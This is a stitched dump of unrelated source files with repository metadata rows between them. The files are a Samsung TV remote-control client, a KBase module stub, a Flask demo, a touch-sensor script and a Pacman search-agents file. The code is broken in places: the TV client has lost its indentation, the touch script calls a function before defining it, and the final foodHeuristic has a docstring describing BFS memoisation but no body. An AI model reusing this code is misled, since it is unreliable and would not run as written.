        _LOGGING.debug("Save token to file: %s", token)
        with open(self.token_file, "w") as token_file:
            token_file.write(token)
    else:
        self.token = token
def _ws_send(self, command, key_press_delay=None, *, use_control=False, ws_socket=None):
using_remote = False
if not use_control:
if self._ws_remote:
connection = self._ws_remote
using_remote = True
else:
connection = self.open()
elif ws_socket:
connection = ws_socket
else:
return
payload = json.dumps(command)
connection.send(payload)
if using_remote:
# we consider a message sent valid as a ping
self._last_ping = datetime.now()
if key_press_delay is None:
time.sleep(self.key_press_delay)
elif key_press_delay > 0:
time.sleep(key_press_delay)
def _rest_request(self, target, method="GET"):
url = self._format_rest_url(target)
try:
if method == "POST":
return requests.post(url, timeout=self.timeout)
elif method == "PUT":
return requests.put(url, timeout=self.timeout)
elif method == "DELETE":
return requests.delete(url, timeout=self.timeout)
else:
return requests.get(url, timeout=self.timeout)
except requests.ConnectionError:
raise exceptions.HttpApiError(
"TV unreachable or feature not supported on this model."
)
def _process_api_response(self, response):
try:
return json.loads(response)
except json.JSONDecodeError:
_LOGGING.debug(
"Failed to parse response from TV. response text: %s", response
)
raise exceptions.ResponseError(
"Failed to parse response from TV. Maybe feature not supported on this model"
)
def _client_remote_thread(self):
if self._ws_remote:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_remote = websocket.WebSocketApp(
url,
on_message=self._on_message_remote,
on_ping=self._on_ping_remote,
)
_LOGGING.debug("Thread SamsungRemote started")
# we set ping interval (1 hour) only to enable multi-threading mode
# on socket. TV do not answer to ping but send ping to client
self._ws_remote.run_forever(
sslopt=sslopt, ping_interval=3600, ping_timeout=2
)
self._is_connected = False
if self._ws_art:
self._ws_art.close()
if self._ws_control:
self._ws_control.close()
self._ws_remote.close()
self._ws_remote = None
_LOGGING.debug("Thread SamsungRemote terminated")
def _on_ping_remote(self, payload):
_LOGGING.debug("Received ping %s, sending pong", payload)
self._last_ping = datetime.now()
if self._ws_remote.sock:
try:
self._ws_remote.sock.pong(payload)
except Exception as ex:
_LOGGING.warning("send_pong failed: {}".format(ex))
def _on_message_remote(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
# we consider a message valid as a ping
self._last_ping = datetime.now()
if event == "ms.channel.connect":
_LOGGING.debug("Message remote: received connect")
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
self._is_connected = True
self._request_apps_list()
self.start_client(start_all=True)
elif event == "ed.installedApp.get":
_LOGGING.debug("Message remote: received installedApp")
self._handle_installed_app(response)
# self.start_client(start_all=True)
elif event == "ed.edenTV.update":
_LOGGING.debug("Message remote: received edenTV")
self.get_running_app(force_scan=True)
def _request_apps_list(self):
_LOGGING.debug("Request app list")
self._ws_send(
{
"method": "ms.channel.emit",
"params": {"event": "ed.installedApp.get", "to": "host"},
},
key_press_delay=0,
)
def _handle_installed_app(self, response):
list_app = response.get("data", {}).get("data")
installed_app = {}
for app_info in list_app:
app_id = app_info["appId"]
_LOGGING.debug("Found app: %s", app_id)
app = App(app_id, app_info["name"], app_info["app_type"])
installed_app[app_id] = app
self._installed_app = installed_app
def _client_control_thread(self):
if self._ws_control:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_APP_CONTROL,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_control = websocket.WebSocketApp(
url,
on_message=self._on_message_control,
)
_LOGGING.debug("Thread SamsungControl started")
self._ws_control.run_forever(sslopt=sslopt)
self._ws_control.close()
self._ws_control = None
_LOGGING.debug("Thread SamsungControl terminated")
def _on_message_control(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
result = response.get("result")
if result:
self._set_running_app(response)
return
error = response.get("error")
if error:
self._manage_control_err(response)
return
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message control: received connect")
self.get_running_app()
def _set_running_app(self, response):
app_id = response.get("id")
if not app_id:
return
result = response.get("result")
if result is None:
return
elif isinstance(result, bool):
is_running = result
else:
is_running = result.get("visible")
if is_running is None:
return
if self._running_app:
if is_running and app_id != self._running_app:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
elif not is_running and app_id == self._running_app:
_LOGGING.debug("app stopped: %s", app_id)
self._running_app = None
elif is_running:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
def _manage_control_err(self, response):
app_id = response.get("id")
if not app_id:
return
error_code = response.get("error", {}).get("code", 0)
if error_code == 404: # Not found error
if self._installed_app:
if app_id not in self._installed_app:
_LOGGING.error("App ID %s not found", app_id)
return
# app_type = self._app_type.get(app_id)
# if app_type is None:
# _LOGGING.info(
# "App ID %s with type DEEP_LINK not found, set as NATIVE_LAUNCH",
# app_id,
# )
# self._app_type[app_id] = 4
def _get_app_status(self, app_id, app_type):
_LOGGING.debug("Get app status: AppID: %s, AppType: %s", app_id, app_type)
# if app_type == 4:
# method = "ms.webapplication.get"
# else:
# method = "ms.application.get"
if app_type == 4: # app type 4 always return not found error
return
method = "ms.application.get"
self._ws_send(
{
"id": app_id,
"method": method,
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
def _client_art_thread(self):
if self._ws_art:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_ART,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_art = websocket.WebSocketApp(
url,
on_message=self._on_message_art,
)
_LOGGING.debug("Thread SamsungArt started")
self._ws_art.run_forever(sslopt=sslopt)
self._ws_art.close()
self._ws_art = None
_LOGGING.debug("Thread SamsungArt terminated")
def _on_message_art(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message art: received connect")
self._client_art_supported = 1
elif event == "ms.channel.ready":
_LOGGING.debug("Message art: channel ready")
self._get_artmode_status()
elif event == "d2d_service_message":
_LOGGING.debug("Message art: d2d message")
self._handle_artmode_status(response)
def _get_artmode_status(self):
_LOGGING.debug("Sending get_art_status")
msg_data = {
"request": "get_artmode_status",
"id": gen_uuid(),
}
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"data": json.dumps(msg_data),
"to": "host",
"event": "art_app_request",
},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_art,
)
def _handle_artmode_status(self, response):
data_str = response.get("data")
if not data_str:
return
data = self._process_api_response(data_str)
event = data.get("event", "")
if event == "art_mode_changed":
status = data.get("status", "")
if status == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "artmode_status":
value = data.get("value", "")
if value == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "go_to_standby":
artmode_status = ArtModeStatus.Unavailable
elif event == "wakeup":
self._get_artmode_status()
return
else:
# Unknown message
return
if self._power_on_requested and artmode_status != ArtModeStatus.Unavailable:
if artmode_status == ArtModeStatus.On:
self.send_key("KEY_POWER", key_press_delay=0)
self._power_on_requested = False
self._artmode_status = artmode_status
@property
def is_connected(self):
return self._is_connected
@property
def artmode_status(self):
return self._artmode_status
@property
def installed_app(self):
return self._installed_app
@property
def running_app(self):
return self._running_app
def ping_device(self):
result = self._ping.ping()
# check ws ping/pong
call_time = datetime.now()
if result and self._ws_remote:
difference = (call_time - self._last_ping).total_seconds()
result = difference < MAX_WS_PING_INTERVAL
if not result:
self.stop_client()
if self._artmode_status != ArtModeStatus.Unsupported:
self._artmode_status = ArtModeStatus.Unavailable
if self._power_on_requested:
difference = (call_time - self._power_on_requested_time).total_seconds()
if difference > 20:
self._power_on_requested = False
return result
def set_power_on_request(self):
self._power_on_requested = True
self._power_on_requested_time = datetime.now()
def get_running_app(self, *, force_scan=False):
if not self._ws_control:
return
with self._sync_lock:
call_time = datetime.now()
difference = (call_time - self._last_app_scan).total_seconds()
if (difference < MIN_APP_SCAN_INTERVAL and not force_scan) or difference < 1:
return
self._last_app_scan = call_time
if self._app_list is not None:
app_to_check = {}
for app_name, app_id in self._app_list.items():
app = None
if self._installed_app:
app = self._installed_app.get(app_id)
else:
app_type = self._app_type.get(app_id, 2)
if app_type <= 4:
app = App(app_id, app_name, app_type)
if app:
app_to_check[app_id] = app
else:
app_to_check = self._installed_app
for app in app_to_check.values():
self._get_app_status(app.app_id, app.app_type)
def start_client(self, *, start_all=False):
"""Start all thread that connect to the TV websocket"""
if self._client_remote is None or not self._client_remote.is_alive():
self._client_remote = Thread(target=self._client_remote_thread)
self._client_remote.name = "SamsungRemote"
self._client_remote.setDaemon(True)
self._client_remote.start()
if start_all:
if self._client_control is None or not self._client_control.is_alive():
self._client_control = Thread(target=self._client_control_thread)
self._client_control.name = "SamsungControl"
self._client_control.setDaemon(True)
self._client_control.start()
if (
self._client_art_supported > 0 and
(self._client_art is None or not self._client_art.is_alive())
):
if self._client_art_supported > 1:
self._client_art_supported = 0
self._client_art = Thread(target=self._client_art_thread)
self._client_art.name = "SamsungArt"
self._client_art.setDaemon(True)
self._client_art.start()
def stop_client(self):
if self._ws_remote:
self._ws_remote.close()
def open(self):
if self.connection is not None:
return self.connection
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
_LOGGING.debug("WS url %s", url)
connection = websocket.create_connection(url, self.timeout, sslopt=sslopt)
response = self._process_api_response(connection.recv())
if response["event"] == "ms.channel.connect":
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
else:
self.close()
raise exceptions.ConnectionFailure(response)
self.connection = connection
return connection
def close(self):
if self.connection:
self.connection.close()
self.connection = None
_LOGGING.debug("Connection closed.")
def send_key(self, key, key_press_delay=None, cmd="Click"):
_LOGGING.debug("Sending key %s", key)
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": cmd,
"DataOfCmd": key,
"Option": "false",
"TypeOfRemote": "SendRemoteKey",
},
},
key_press_delay,
)
def hold_key(self, key, seconds):
self.send_key(key, key_press_delay=0, cmd="Press")
time.sleep(seconds)
self.send_key(key, key_press_delay=0, cmd="Release")
def move_cursor(self, x, y, duration=0):
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": "Move",
"Position": {"x": x, "y": y, "Time": str(duration)},
"TypeOfRemote": "ProcessMouseDevice",
},
},
key_press_delay=0,
)
def run_app(self, app_id, action_type="", meta_tag="", *, use_remote=False):
if not action_type:
app = self._installed_app.get(app_id)
if app:
app_type = app.app_type
else:
app_type = self._app_type.get(app_id, 2)
action_type = TYPE_DEEP_LINK if app_type == 2 else TYPE_NATIVE_LAUNCH
elif action_type != TYPE_NATIVE_LAUNCH:
action_type = TYPE_DEEP_LINK
_LOGGING.debug(
"Sending run app app_id: %s app_type: %s meta_tag: %s",
app_id,
action_type,
meta_tag,
)
if self._ws_control and action_type == TYPE_DEEP_LINK and not use_remote:
self._ws_send(
{
"id": app_id,
"method": "ms.application.start",
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
return
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"event": "ed.apps.launch",
"to": "host",
"data": {
# action_type: NATIVE_LAUNCH / DEEP_LINK
# app_type == 2 ? 'DEEP_LINK' : 'NATIVE_LAUNCH',
"action_type": action_type,
"appId": app_id,
"metaTag": meta_tag,
},
},
},
key_press_delay=0,
)
def open_browser(self, url):
_LOGGING.debug("Opening url in browser %s", url)
self.run_app("org.tizen.browser", TYPE_NATIVE_LAUNCH, url)
def rest_device_info(self):
_LOGGING.debug("Get device info via rest api")
response = self._rest_request("")
return self._process_api_response(response.text)
def rest_app_status(self, app_id):
_LOGGING.debug("Get app %s status via rest api", app_id)
response = self._rest_request("applications/" + app_id)
return self._process_api_response(response.text)
def rest_app_run(self, app_id):
_LOGGING.debug("Run app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "POST")
return self._process_api_response(response.text)
def rest_app_close(self, app_id):
_LOGGING.debug("Close app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "DELETE")
return self._process_api_response(response.text)
def rest_app_install(self, app_id):
_LOGGING.debug("Install app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "PUT")
return self._process_api_response(response.text)
def shortcuts(self):
return shortcuts.SamsungTVShortcuts(self)
| [
"eric@plante.ca"
] | eric@plante.ca |
2b6516b8357caff161af954e665fc30dd6a1ad1e | 8bb6e8535c12c541866ad87fbd221750c7dac127 | /lib/kb_irep/kb_irepImpl.py | 0794129841b97942c4a676c5bd19fb284a692a7c | [
"MIT"
] | permissive | jungbluth/kb_irep | 1a0caa793133ec587a0cf8b8de4154c2bb5c82aa | 55c8f2bfb3ccba74d3418dec31acf6d9630b1ac5 | refs/heads/master | 2021-07-18T06:00:00.508236 | 2020-12-30T20:26:15 | 2020-12-30T20:26:15 | 227,967,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,768 | py | # -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
from installed_clients.KBaseReportClient import KBaseReport
#END_HEADER
class kb_irep:
'''
Module Name:
kb_irep
Module Description:
A KBase module: kb_irep
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = "https://github.com/jungbluth/kb_irep"
GIT_COMMIT_HASH = "27849324019fb7eeabff2796e9e33115d976f459"
#BEGIN_CLASS_HEADER
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
level=logging.INFO)
#END_CONSTRUCTOR
pass
def run_kb_irep(self, ctx, params):
"""
This example function accepts any number of parameters and returns results in a KBaseReport
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_kb_irep
report = KBaseReport(self.callback_url)
report_info = report.create({'report': {'objects_created':[],
'text_message': params['parameter_1']},
'workspace_name': params['workspace_name']})
output = {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END run_kb_irep
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_kb_irep return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
| [
"jungbluth.sean@gmail.com"
] | jungbluth.sean@gmail.com |
db5c965f2a0a9a8eca0e23b6beaa853f2fa82cff | 14d7dbf445a5fde2a6611c41cd55bc17978afec4 | /flask_app/application.py | bfdd92df2989f1ed4b3c63654868c835612a6b6b | [] | no_license | Happollyon/Class2 | a7ef72caefebf5e23209b06ecf84560d3b73394f | 8136fd0c70cf1cc4e82361d5a2ca54c282e5066c | refs/heads/master | 2022-09-17T07:14:09.356631 | 2020-05-28T14:23:37 | 2020-05-28T14:23:37 | 257,603,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from flask import Flask, render_template,request, session
#from flask_session import Session
app=Flask(__name__)
@app.route('/')
def index():
    """Root route: return a plain-text greeting."""
    message = "Hello world"
    return message
@app.route('/fagner')
def fagner():
    """Static route returning a fixed greeting."""
    return "hello fagner"
@app.route("/<string:name>") # you can set a rout name
def hello(name):
return f"hello, {name}"
#templates look at netes and conditions inside ginger
#extend templates
| [
"36013973+Happollyon@users.noreply.github.com"
] | 36013973+Happollyon@users.noreply.github.com |
a564fadbeb8da66f7e99e8a1c5af6eec0923b3f2 | 5160cd2cf1ff8aa1d48935a783ba39e59f8d9ca7 | /src/py.py | bbfff52bf7a351f5fc2d85e6364080af152fd517 | [] | no_license | harry-uglow/BananaBeats | eb9df6f9458e1d12a406f0d96dbe9980f278af6e | 2e0eb211f5646be5675237c5c1c70d2feed8c57f | refs/heads/master | 2021-01-19T12:47:57.520881 | 2017-08-29T20:36:19 | 2017-08-29T20:36:19 | 100,810,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | import subprocess
import threading
import sys
import time
import pygame
import os
import signal
import python.adafruit_libraries.Adafruit_MPR121.MPR121 as MPR121
print('strt')
# Launch the C audio engine; touch/release events are piped to its stdin.
p = subprocess.Popen(['./main'], stdin = subprocess.PIPE, close_fds=True, shell=True)
# Maybe add shell=True if it doesn't work
print('mon')
# NOTE(review): monitorInputs() is called here but defined further down the
# file — executing this module as written raises NameError; this call should
# be moved below the function definition.
monitorInputs()
def monitorInputs():
    """Poll the MPR121 capacitive-touch sensor forever and forward every pin
    touch/release transition to the child process ``p`` via its stdin
    ('t<pin>' on touch, 'r<pin>' on release, one event per line)."""
    # Create MPR121 instance
    device = MPR121.MPR121()
    if not device.begin():
        sys.exit(1)
    pygame.mixer.pre_init(44100, -16, 12, 2048)
    pygame.init()
    # Main loop: compare the current touch bitmask against the previous one
    # and emit an event for each pin whose state changed.
    last_touched = device.touched()
    while True:
        current_touched = device.touched()
        for i in range(12):
            pin_bit = 1 << i
            if current_touched & pin_bit and not last_touched & pin_bit:
                # BUG FIX: the original wrote 't' + i (and printed it), which
                # raises TypeError — cannot concatenate str and int. Format
                # the pin number into the string instead.
                p.stdin.write('t%d\n' % i)
                print('t%d' % i)
                p.stdin.flush()
                print('Pin ', i, ' touched')
            if not current_touched & pin_bit and last_touched & pin_bit:
                # Same str+int fix for the release event.
                p.stdin.write('r%d\n' % i)
                p.stdin.flush()
                print('Pin ', i, ' released')
        last_touched = current_touched
        time.sleep(0.1)
| [
"mauriceyap@hotmail.co.uk"
] | mauriceyap@hotmail.co.uk |
ce2ce7dc2c0f952870f86143e1a519cfa7a22b93 | 2825a2d056db418a3bf04d8d2ffc7133cd552d0f | /jsondiff/mountpoint.py | b2b2f60d5cdfca5d072f5297f75289d5d311cb15 | [] | no_license | trendsnet/jsondiff | eabba41a2c9111d2a2aefdb460564fcc7f1743b8 | dce2af96542cb986dd1bd927972faf8c505364d9 | refs/heads/master | 2020-05-30T04:57:37.713001 | 2017-05-08T07:41:22 | 2017-05-08T07:41:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 131 | py | #coding:utf-8
__author__ = 'Feng Lu'
from .views.diff import diff
# (view, URL-prefix) pairs consumed by the application's router.
# NOTE(review): the same `diff` view is mounted on both "/diff" and "/" —
# presumably so the diff page also serves as the site root; confirm with
# the code that consumes MOUNT_POINTS.
MOUNT_POINTS = ((diff, "/diff"),
                (diff, "/"),
                )
"liyanjie8@wanda.cn"
] | liyanjie8@wanda.cn |
973f38ed0345cb23c877e3d788c07856de7093ea | aa97a1a30d3f4cc65b80cfbb76ff88f55e96f67b | /A-Star-Search/search/searchAgents.py | bf0c1649b6b366a5fb4c716f1af59a0f9fa5d13a | [] | no_license | yorhaha/AI-Tasks | a0df0728ef013fd8053d3ef699b04baa38b931ce | 6197b9990f997bcf9f3f5ccb6773513670b35ea0 | refs/heads/main | 2023-09-03T16:50:48.365762 | 2021-10-30T02:04:13 | 2021-10-30T02:04:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,856 | py | """
This file contains all of the agents that can be selected to control Pacman. To
select an agent, use the '-p' option when running pacman.py. Arguments can be
passed to your agent using '-a'. For example, to load a SearchAgent that uses
depth first search (dfs), run the following command:
> python pacman.py -p SearchAgent -a fn=depthFirstSearch
Commands to invoke other search strategies can be found in the project
description.
Please only change the parts of the file you are asked to. Look for the lines
that say
"*** YOUR CODE HERE ***"
The parts you fill in start about 3/4 of the way down. Follow the project
description for details.
Good luck and happy searching!
"""
from game import Directions
from game import Agent
from game import Actions
import util
import time
import search
class GoWestAgent(Agent):
    "An agent that goes West until it can't."

    def getAction(self, state):
        "The agent receives a GameState (defined in pacman.py)."
        legal_moves = state.getLegalPacmanActions()
        return Directions.WEST if Directions.WEST in legal_moves else Directions.STOP
#######################################################
# This portion is written for you, but will only work #
# after you fill in parts of search.py #
#######################################################
class SearchAgent(Agent):
    """
    This very general search agent finds a path using a supplied search
    algorithm for a supplied search problem, then returns actions to follow that
    path.
    As a default, this agent runs DFS on a PositionSearchProblem to find
    location (1,1)
    Options for fn include:
    depthFirstSearch or dfs
    breadthFirstSearch or bfs
    aStarSearch or astar
    Note: You should NOT change any code in SearchAgent
    """

    def __init__(self, fn='depthFirstSearch', prob='PositionSearchProblem', heuristic='nullHeuristic'):
        # Warning: some advanced Python magic is employed below to find the right functions and problems
        # Get the search function from the name and heuristic
        if fn not in dir(search):
            raise AttributeError(fn + ' is not a search function in search.py.')
        func = getattr(search, fn)
        # Only wrap a heuristic in when the chosen search function accepts one
        # (detected by inspecting its parameter names).
        if 'heuristic' not in func.__code__.co_varnames:
            print('[SearchAgent] using function ' + fn)
            self.searchFunction = func
        else:
            # Resolve the heuristic by name: first in this module, then in search.py.
            if heuristic in globals().keys():
                heur = globals()[heuristic]
            elif heuristic in dir(search):
                heur = getattr(search, heuristic)
            else:
                raise AttributeError(heuristic + ' is not a function in searchAgents.py or search.py.')
            print('[SearchAgent] using function %s and heuristic %s' % (fn, heuristic))
            # Note: this bit of Python trickery combines the search algorithm and the heuristic
            self.searchFunction = lambda x: func(x, heuristic=heur)

        # Get the search problem type from the name (must be a *Problem class
        # defined in this module).
        if prob not in globals().keys() or not prob.endswith('Problem'):
            raise AttributeError(prob + ' is not a search problem type in SearchAgents.py.')
        self.searchType = globals()[prob]
        print('[SearchAgent] using problem type ' + prob)

    def registerInitialState(self, state):
        """
        This is the first time that the agent sees the layout of the game
        board. Here, we choose a path to the goal. In this phase, the agent
        should compute the path to the goal and store it in a local variable.
        All of the work is done in this method!
        state: a GameState object (pacman.py)
        """
        if self.searchFunction == None: raise Exception("No search function provided for SearchAgent")
        starttime = time.time()
        problem = self.searchType(state) # Makes a new search problem
        self.actions  = self.searchFunction(problem) # Find a path
        totalCost = problem.getCostOfActionSequence(self.actions)
        print('Path found with total cost of %d in %.1f seconds' % (totalCost, time.time() - starttime))
        # _expanded is bookkeeping set by the search-problem classes below.
        if '_expanded' in dir(problem): print('Search nodes expanded: %d' % problem._expanded)

    def getAction(self, state):
        """
        Returns the next action in the path chosen earlier (in
        registerInitialState). Return Directions.STOP if there is no further
        action to take.
        state: a GameState object (pacman.py)
        """
        # Lazily initialize the replay cursor on the first call.
        if 'actionIndex' not in dir(self): self.actionIndex = 0
        i = self.actionIndex
        self.actionIndex += 1
        if i < len(self.actions):
            return self.actions[i]
        else:
            return Directions.STOP
class PositionSearchProblem(search.SearchProblem):
    """
    A search problem defines the state space, start state, goal test, child
    function and cost function. This search problem can be used to find paths
    to a particular point on the pacman board.
    The state space consists of (x,y) positions in a pacman game.
    Note: this search problem is fully specified; you should NOT change it.
    """

    def __init__(self, gameState, costFn = lambda x: 1, goal=(1,1), start=None, warn=True, visualize=True):
        """
        Stores the start and goal.
        gameState: A GameState object (pacman.py)
        costFn: A function from a search state (tuple) to a non-negative number
        goal: A position in the gameState
        """
        self.walls = gameState.getWalls()
        self.startState = gameState.getPacmanPosition()
        if start != None: self.startState = start
        self.goal = goal
        self.costFn = costFn
        self.visualize = visualize
        if warn and (gameState.getNumFood() != 1 or not gameState.hasFood(*goal)):
            print('Warning: this does not look like a regular search maze')

        # For display purposes
        self._visited, self._visitedlist, self._expanded = {}, [], 0 # DO NOT CHANGE

    def getStartState(self):
        # Returns the (x, y) start position.
        return self.startState

    def isGoalState(self, state):
        isGoal = state == self.goal

        # For display purposes only
        if isGoal and self.visualize:
            self._visitedlist.append(state)
            import __main__
            if '_display' in dir(__main__):
                if 'drawExpandedCells' in dir(__main__._display): #@UndefinedVariable
                    __main__._display.drawExpandedCells(self._visitedlist) #@UndefinedVariable

        return isGoal

    def expand(self, state):
        """
        Returns child states, the actions they require, and a cost of 1.
        As noted in search.py:
        For a given state, this should return a list of triples,
        (child, action, stepCost), where 'child' is a
        child to the current state, 'action' is the action
        required to get there, and 'stepCost' is the incremental
        cost of expanding to that child
        """
        children = []
        for action in self.getActions(state):
            nextState = self.getNextState(state, action)
            cost = self.getActionCost(state, action, nextState)
            children.append( ( nextState, action, cost) )

        # Bookkeeping for display purposes
        self._expanded += 1 # DO NOT CHANGE
        if state not in self._visited:
            self._visited[state] = True
            self._visitedlist.append(state)

        return children

    def getActions(self, state):
        # Legal moves are the four compass directions that do not hit a wall.
        possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
        valid_actions_from_state = []
        for action in possible_directions:
            x, y = state
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                valid_actions_from_state.append(action)
        return valid_actions_from_state

    def getActionCost(self, state, action, next_state):
        # Cost is determined solely by the state being entered (costFn).
        assert next_state == self.getNextState(state, action), (
            "Invalid next state passed to getActionCost().")
        return self.costFn(next_state)

    def getNextState(self, state, action):
        assert action in self.getActions(state), (
            "Invalid action passed to getActionCost().")
        x, y = state
        dx, dy = Actions.directionToVector(action)
        nextx, nexty = int(x + dx), int(y + dy)
        return (nextx, nexty)

    def getCostOfActionSequence(self, actions):
        """
        Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999.
        """
        if actions == None: return 999999
        x,y= self.getStartState()
        cost = 0
        for action in actions:
            # Check figure out the next state and see whether its' legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]: return 999999
            cost += self.costFn((x,y))
        return cost
def manhattanHeuristic(position, problem, info={}):
    "The Manhattan distance heuristic for a PositionSearchProblem"
    px, py = position
    gx, gy = problem.goal
    return abs(px - gx) + abs(py - gy)
def euclideanHeuristic(position, problem, info={}):
    "The Euclidean distance heuristic for a PositionSearchProblem"
    dx = position[0] - problem.goal[0]
    dy = position[1] - problem.goal[1]
    return (dx ** 2 + dy ** 2) ** 0.5
#####################################################
# This portion is incomplete. Time to write code! #
#####################################################
class FoodSearchProblem:
    """
    A search problem associated with finding the a path that collects all of the
    food (dots) in a Pacman game.
    A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
    pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
    foodGrid: a Grid (see game.py) of either True or False, specifying remaining food
    """

    def __init__(self, startingGameState):
        self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
        self.walls = startingGameState.getWalls()
        self.startingGameState = startingGameState
        self._expanded = 0 # DO NOT CHANGE
        self.heuristicInfo = {} # A dictionary for the heuristic to store information

    def getStartState(self):
        return self.start

    def isGoalState(self, state):
        # Goal: no food left in the grid.
        return state[1].count() == 0

    def expand(self, state):
        "Returns child states, the actions they require, and a cost of 1."
        children = []
        self._expanded += 1 # DO NOT CHANGE
        for action in self.getActions(state):
            next_state = self.getNextState(state, action)
            action_cost = self.getActionCost(state, action, next_state)
            children.append( ( next_state, action, action_cost) )
        return children

    def getActions(self, state):
        # Legal moves are the four compass directions that do not hit a wall.
        possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
        valid_actions_from_state = []
        for action in possible_directions:
            x, y = state[0]
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                valid_actions_from_state.append(action)
        return valid_actions_from_state

    def getActionCost(self, state, action, next_state):
        # Every step costs 1 in this problem.
        assert next_state == self.getNextState(state, action), (
            "Invalid next state passed to getActionCost().")
        return 1

    def getNextState(self, state, action):
        assert action in self.getActions(state), (
            "Invalid action passed to getActionCost().")
        x, y = state[0]
        dx, dy = Actions.directionToVector(action)
        nextx, nexty = int(x + dx), int(y + dy)
        # Copy the grid so sibling states are not mutated, and eat any food
        # at the destination square.
        nextFood = state[1].copy()
        nextFood[nextx][nexty] = False
        return ((nextx, nexty), nextFood)

    def getCostOfActionSequence(self, actions):
        """Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999"""
        x,y= self.getStartState()[0]
        cost = 0
        for action in actions:
            # figure out the next state and see whether it's legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
            cost += 1
        return cost
class AStarFoodSearchAgent(SearchAgent):
    "A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
    def __init__(self):
        # Bind A* with foodHeuristic as the fixed strategy; the inherited
        # SearchAgent machinery handles planning and action replay.
        self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
        self.searchType = FoodSearchProblem
def foodHeuristic(state, problem: FoodSearchProblem):
    """Heuristic for FoodSearchProblem: the true maze distance (via BFS) from
    Pacman's position to the *farthest* remaining food dot.

    This is admissible (that dot must eventually be reached, costing at least
    that many steps) and consistent.

    state: a tuple (pacmanPosition, foodGrid) where foodGrid is a Grid of
    booleans (see game.py); foodGrid.asList() yields the food coordinates.

    Performance: BFS maze distances are memoized in problem.heuristicInfo
    (provided for exactly this purpose), since the same (start, goal) pairs
    recur across the many heuristic evaluations of a single A* run.
    """
